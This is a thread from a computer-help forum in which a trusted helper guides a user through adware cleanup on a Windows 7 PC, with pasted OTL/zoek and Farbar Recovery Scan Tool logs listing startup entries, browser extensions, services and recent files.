2014-10-10 01:57:58 4ADCFEE16EE9978F06157634669D36FB 602112 ----a-w- C:\Users\Mitey Fresh\Downloads\OTL.exe
=== C: other files ==
2014-10-16 02:28:36 FC1F36A7844235BACFE12DF3FD486026 14957 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\get.bat
2014-10-16 02:28:36 F56A319979F631C141F5FF02DF87FDB1 43563 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\prelim.bat
2014-10-16 02:28:36 E5E1041DE1DBDDF20D704BA894BEAD05 183929 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\misc.bat
2014-10-16 02:28:36 E01FF880FC345F56C61E80C91FA03687 9384 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\runvalues.bat
2014-10-16 02:28:36 DD1E4D974B1672ABD09EFFB225791C4A 1230 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\TDL4.bat
2014-10-16 02:28:36 AD2F52DC72B10AF331692E4A4DD80DFC 18670 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\medfos.bat
2014-10-16 02:28:36 AA0C656F898523BEDF2DA6923197BB80 1264 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\surfvox.bat
2014-10-16 02:28:36 8E6020C14F982CF11B3FE7DBB0CB8EDE 24738 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\searchlnk.bat
2014-10-16 02:28:36 86707BCE5CBB65D9B1C41E249B4423BA 152733 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\firefox.bat
2014-10-16 02:28:36 83F691D8398F0E37E71E9355BF730DB9 719 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\ev_clear.bat
2014-10-16 02:28:36 4D80C7010E2CE44AB25FA25B013649E4 8085 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\mws.bat
2014-10-16 02:28:36 38A0BDF322ACCC968B0A824C38D50157 29635 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\ask.bat
2014-10-16 02:28:36 335DFF8F23E5EC02B5426362F0F8509B 31401 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\iexplore.bat
2014-10-16 02:28:36 1EFD82B5DDC672FE3D2AFE731898BAF4 14044 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\chrome.bat
2014-10-16 02:28:36 0C4649A62845AB5D5DBCC4998477FF6D 1813 ----a-w- C:\Users\Mitey Fresh\AppData\Local\Temp\jrt\delfolders.bat
2014-10-15 02:07:40 FE571E088C2D83619D2D48D4E961BF41 212480 ----a-w- C:\Windows\System32\drivers\rdpwd.sys
2014-10-15 02:07:37 E232A3B43A894BB327FC161529BD9ED1 39936 ----a-w- C:\Windows\System32\drivers\tssecsrv.sys
 
==== Startup Registry Enabled ======================
 
[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"
 
[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"
 
[HKEY_USERS\S-1-5-21-2275511576-419542734-2349628481-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"Spotify Web Helper"="C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
 
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SPReview"="C:\Windows\System32\SPReview\SPReview.exe /sp:1 /errorfwlink:http://go.microsoft..../?LinkID=122915 /build:7601"
 
[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"
 
[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"
 
[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SPReview"="C:\Windows\System32\SPReview\SPReview.exe /sp:1 /errorfwlink:http://go.microsoft..../?LinkID=122915 /build:7601"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Spotify Web Helper"="C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
 
==== Startup Registry Enabled x64 ======================
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\Windows\system32\igfxtray.exe"
"HotKeysCmds"="C:\Windows\system32\hkcmd.exe"
"Persistence"="C:\Windows\system32\igfxpers.exe"
"MSC"="c:\Program Files\Microsoft Security Client\msseces.exe -hide -runkey"
"FAHConsole"="C:\Program Files\File Association Helper\FAHConsole.exe"
 
==== Startup Registry Disabled x64 ======================
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Lite]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="DAEMON Tools Lite"
"hkey"="HKCU"
"command"="\"C:\\Program Files (x86)\\DAEMON Tools Lite\\DTLite.exe\" -autorun"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DelaypluginInstall]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="DelaypluginInstall"
"hkey"="HKLM"
"command"="C:\\ProgramData\\iSkysoft\\Video Converter Ultimate\\DelayPluginI.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\iSkysoft Helper Compact.exe]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="iSkysoft Helper Compact.exe"
"hkey"="HKLM"
"command"="C:\\Program Files (x86)\\Common Files\\iSkysoft\\iSkysoft Helper Compact\\ISHelper.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Jing]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Jing"
"hkey"="HKCU"
"command"="C:\\Program Files (x86)\\TechSmith\\Jing\\Jing.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LifeCam]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="LifeCam"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Microsoft LifeCam\\LifeExp.exe\""
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="LogMeIn Hamachi Ui"
"hkey"="HKLM"
"command"="\"D:\\Games\\LogMeIn Hamachi\\hamachi-2-ui.exe\" --auto-start"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OutfoxTV]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="OutfoxTV"
"hkey"="HKCU"
"command"="C:\\Program Files\\OutfoxTV\\OutfoxTV\\DesktopContainer.exe"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Spotify]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Spotify"
"hkey"="HKCU"
"command"="\"C:\\Users\\Mitey Fresh\\AppData\\Roaming\\Spotify\\spotify.exe\" /uri spotify:autostart"
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Spotify Web Helper]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Spotify Web Helper"
"hkey"="HKCU"
"command"="\"C:\\Users\\Mitey Fresh\\AppData\\Roaming\\Spotify\\Data\\SpotifyWebHelper.exe\""
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched]
"key"="SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="SunJavaUpdateSched"
"hkey"="HKLM"
"command"="\"C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe\""
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\VX1000]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="VX1000"
"hkey"="HKLM"
"command"="C:\\Windows\\vVX1000.exe"
 
 
==== Task Scheduler Jobs ======================
 
C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [24/09/2014 08:48 PM]
C:\Windows\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job --a------ C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe [12/10/2014 10:10 PM]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [25/02/2014 04:36 PM]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a------ C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [25/02/2014 04:36 PM]
 
==== Other Scheduled Tasks ======================
 
"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000" [C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\Optimizer Pro Schedule" ["C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe"]
"C:\Windows\SysNative\tasks\{B4A540EE-B703-4F88-8A36-0C4394E38292}" [C:\Program Files (x86)\Google\Chrome\Application\chrome.exe]
"C:\Windows\SysNative\tasks\{EBC5B4FF-C5FF-4433-9543-6D4208E88780}" [C:\Program Files (x86)\Google\Chrome\Application\chrome.exe]
 
==== Firefox Extensions Registry ======================
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]"="C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]" [30/09/2014 05:07 PM]
 
==== Firefox Extensions ======================
 
ProfilePath: C:\Users\MITEYF~1\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
- Undetermined - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com
- iSkysoft Video Converter Ultimate - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]
- Undetermined - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
- UTubErAdBllockEr - %ProfilePath%\extensions\[email protected]
- RooboSaver - %ProfilePath%\extensions\[email protected]
 
AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
==== Firefox Plugins ======================
 
Profilepath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
E3B4EA121F7BDEB0F6366E2BA9608CB5 - C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll - Citrix Online Web Deployment Plugin 1.0.0.104
546A28FBC44B984FD92530227BF6F5C2 - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll - Shockwave for Director / Shockwave for Director
15E298B5EC5B89C5994A59863969D9FF - C:\Windows\SysWOW64\npmproxy.dll - Microsoft® Windows® Operating System
 
 
==== Chromium Look ======================
 
SEOquake - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc
Google Docs - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Reddit Enhancement Suite - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb
Google Wallet - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Google Docs - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Skype for Chromium - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl
UTubErAdBllockEr - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\ncjehgeihgchlopaaacphighmfcjcfjb
Google Wallet - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
 
==== Chromium Startpages ======================
 
C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Preferences
"startup_urls": [ "http://www.google.com.au/" ],
 
 
==== IE Start and Search Settings ======================
 
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="yes"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchUrl]
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"Default_Search_URL"="http://www.google.com"
"SearchAssistant"="http://www.google.com"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
 
==== All HKCU SearchScopes ======================
 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/...ox&FORM=IE11SR"
 
==== C:\zoek_backup content ======================
 
C:\zoek_backup (files=0 folders=0 0 bytes)
 
==== EOF on Thu 16/10/2014 at 14:26:02.90 ======================
 
- IE was reset.
 
- FF was reset.

  • 0

#7
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Looking better :)

 

Lets get a fresh scan with FRST

 

FRST.gif Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

 

  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • When the tool opens click Yes to disclaimer.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please copy and paste their content into your next reply.

 

Also, let me know how the computer is working.


  • 0

#8
awesomesauce

awesomesauce

    Member

  • Topic Starter
  • Member
  • PipPip
  • 21 posts

Unfortunately I'm still having issues within Chrome - when I click links sometimes it opens ads.

 

Here's the FRST.txt log:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Mitey Fresh (administrator) on KIRRA-PC on 17-10-2014 08:46:42
Running from C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Nico Mak Computing) C:\Program Files\File Association Helper\FAHWindow.exe
(Spotify Ltd) C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [FAHConsole] => C:\Program Files\File Association Helper\FAHConsole.exe [729272 2014-01-28] (Nico Mak Computing)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\Run: [Spotify Web Helper] => C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-03] (Spotify Ltd)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {496991f1-83b7-11e3-a045-406186b70622} - H:\autorun.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {6140cd31-99d4-11e3-ac34-406186b70622} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {efd7f59c-3f87-11e4-aca2-406186b70622} - F:\Startme.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-27] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: iSkysoft Video Converter Ultimate 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
 
FireFox:
========
FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\f5sas9dj.default-1413430386450
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/JavaPlugin,version=10.17.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @abr.gov.au/KeyMgmtPlugin -> C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]
FF Extension: iSkysoft Video Converter Ultimate - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected] [2014-09-30]
 
Chrome: 
=======
CHR Profile: C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (SEOquake) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2014-03-24]
CHR Extension: (Google Docs) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-25]
CHR Extension: (Google Drive) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-25]
CHR Extension: (YouTube) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-25]
CHR Extension: (Google Search) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-25]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2014-04-21]
CHR Extension: (Google Wallet) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-25]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Hamachi2Svc; D:\Games\LogMeIn Hamachi\hamachi-2.exe [2525008 2014-09-04] (LogMeIn Inc.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-01-23] (Disc Soft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-16 14:17 - 2014-10-16 14:26 - 00041051 _____ () C:\zoek-results.log
2014-10-16 14:16 - 2014-10-16 14:16 - 00000000 ____D () C:\zoek_backup
2014-10-16 13:54 - 2014-10-16 13:54 - 01705698 _____ (Thisisu) C:\Users\Mitey Fresh\Downloads\JRT (1).exe
2014-10-16 12:32 - 2014-10-16 12:32 - 00000000 ____D () C:\Users\Mitey Fresh\Downloads\FRST-OlderVersion
2014-10-15 15:42 - 2014-10-15 15:43 - 00026829 _____ () C:\Users\Mitey Fresh\Downloads\Addition.txt
2014-10-15 15:39 - 2014-10-17 08:46 - 00000000 ____D () C:\FRST
2014-10-15 15:39 - 2014-10-15 15:43 - 00030035 _____ () C:\Users\Mitey Fresh\Downloads\FRST.txt
